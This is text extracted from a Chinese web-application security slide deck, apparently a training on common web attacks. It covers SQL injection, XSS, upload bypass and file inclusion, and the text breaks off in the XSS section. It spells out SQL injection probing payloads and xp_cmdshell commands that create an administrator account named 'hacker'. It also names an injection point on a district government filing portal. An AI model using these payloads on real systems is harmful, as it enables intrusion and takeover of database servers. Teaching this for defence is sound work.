应用与开发安全.pdf

聂万泉(Wquan.Nie) CISSP(Associate)   Advanced programmer Email:SoftDev@c‐ QQ:256796 MSN:nagemeiyou@ 常用的Web攻击手法 如何安全的与用户交互 加密技术Web开发应用 Web开发与数据库安全 Web安全测试 Sql Injection Xss (跨站脚本攻击) bypass Upload Brute Force(穷举) Session Spoof Remote/Local File Include 程序向程序文件内写入参数 其它攻击方法 利用现有的应用程序没有对用户输入数据进行检查和过滤的缺陷, 将恶意的SQL命令注入到后台数据库引擎执行,达到获取数据,甚至控制 数据库服务器的目的． 典型例子: /index.asp?id=8 and (select count(*) from sysobjects)0 • Sql注入的漏洞是在编程时造成的 • 后台数据库允许动态ＳＱＬ语句执行 • 前台应用程序没有对用户输入的数据或者页面提 交的信息进行必要的安全检查 • 数据库自身的特性造成的，与编程语言无关． • 绕过防火墙进行攻击 • 绕过web应用程序的验证过程 • 非法越权操作数据库内容 • 随意篡改网页内容 • 添加系统帐户或数据库帐户 • 上传和下载非法文件 • 本地溢出并获取系统最高权限 • 安装木马后门网络僵尸 • JSP应用程序 • PHP应用程序 • Asp应用程序 • .net应用程序 • MSSQL  (危害最大) • Mysql • Oracle • 其它数据库Sybase,DB2,Access 小榕工具WIS,WED NBSI 阿Ｄ注入工具 明小子 ………… 1.判断是否存在注入 在页面地址后面加 ’ | and 1=1 | and 1=2 返回显示错误或不正常代表有注入漏洞 2.判断数据库类型 Id=1 and (select count(*) from sysobjects)0 可判断是ＭＳＳＱＬ还是ACCESS 3.判断当前权限 Id=1 and 1=(SELECT IS_MEMBER(\db_owner\));‐‐ db_owner可更换成其它mssql角色名比如ＳＹＳＡＤＭＩＮ 4.检查扩展存储是否存在 Select count(*) from master.dbo.sysobjects where xtype=\x\ and  name=\xp_cmdshell\‘ 5.SA权限模式下建立系统用户 ;exec master.dbo.xp_cmdshell \net user hacker 123456 /add\ ;exec master.dbo.xp_cmdshell \net localgroup administrators hacker  /add\ /wssp/shenbaofront/index.jsp 海淀区人民政府行政办事中心‐网上申报平台 注入点:  :80/wssp/shenbaofront/question_text.jsp?act=questioninfoque stion 检测截图: Cross site Scripting (XSS) 黑客在应用程序中非法插入ＨＴＭＬ代码 当受害者浏览该页时，嵌入其中的恶意代码 会被执行,从而达到恶意目的． XSS 的攻击类型 1.跨站点的攻击,特指在虚拟主机上的攻击方式． 2.针对session,Cookie的劫持攻击 3.恶作剧攻击 4.Xss攻击通常要与社会工程学结合起来使用 5.模拟用户完成多页表单。 • XSS攻击导致恶意攻击者 1.绕过访问控制 2.权限提升 3.篡改网站页面 4.得到敏感信息(用户帐号,密码,信用卡等) 5. 其它 • 敏感数据被获取(Cookie 盗窃) • 网络钓鱼 • 获取Web用户浏览的网页内容 • Session Riding(CSRF攻击) • 获取